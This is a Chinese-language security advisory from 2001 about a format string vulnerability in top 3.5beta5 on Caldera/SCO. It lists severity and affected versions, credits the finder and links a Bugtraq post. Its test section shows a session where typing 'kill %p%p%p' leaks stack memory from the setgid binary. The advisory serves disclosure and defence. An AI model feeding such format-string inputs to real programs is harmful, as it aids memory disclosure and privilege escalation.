caldera / SCO 的top存在格式化字符串漏洞发布时间:2001-11-15 更新时间:2001-11-15 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 top-3.5beta5详细描述 SCO中的TOP程序存在格式字符串漏洞可以导致堆栈破坏等进一步攻击。 测试代码 root@atlantic.theatlanticclub.com #ls -al /usr/local/bin/top lrwxrwxrwx 1 root sys 45 Nov 12 12:42 /usr/local/bin/top -> /opt/K/SKUNK98/Top/3.5beta5/usr/local/bin/top root@atlantic.theatlanticclub.com #ls -al /opt/K/SKUNK98/Top/3.5beta5/usr/local/bin/top -rwxr-sr-x 1 root mem 42200 Nov 12 12:41 /opt/K/SKUNK98/Top/3.5beta5/usr/local/bin/top type k for kill while in top ... last pid: 1926; load averages: 0.00, 0.02, 0.00 10:22:44 111 processes: 110 sleeping, 1 onproc CPU states: % idle, % user, % system, % wait, % sxbrk Memory: 384M phys, 357M max, 272M free, 352M locked, 190M unlocked, 125M swap kill %p%p%p last pid: 1930; load averages: 0.00, 0.02, 0.00 10:23:23 111 processes: 110 sleeping, 1 onproc CPU states: % idle, % user, % system, % wait, % sxbrk Memory: 384M phys, 357M max, 272M free, 352M locked, 190M unlocked, 125M swap 8005b3608059e1008047ce024: Not a number 解决方案 尚无 相关信息 KF (dotslash@snosoft.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2001-11/att-0096/01-SCOtop.txt |
